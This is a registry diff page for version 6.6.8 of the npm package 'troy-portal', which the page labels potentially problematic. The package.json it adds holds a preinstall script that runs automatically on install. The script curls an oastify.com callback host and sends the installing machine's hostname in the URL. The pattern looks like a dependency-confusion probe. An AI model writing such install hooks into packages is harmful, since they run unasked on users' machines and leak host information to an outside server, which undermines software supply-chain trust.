troy-portal 6.6.8
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of troy-portal might be problematic. Click here for more details.
- package/package.json +12 -0
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "troy-portal",
|
3
|
+
"version": "6.6.8",
|
4
|
+
"description": "New Package to Test Mex",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "/usr/bin/curl http://6u1pb0lpbhgbu5ubhxlcrh87jyppdg15.oastify.com/test/$h(hostname)"
|
9
|
+
},
|
10
|
+
"author": "gautham.krishna",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|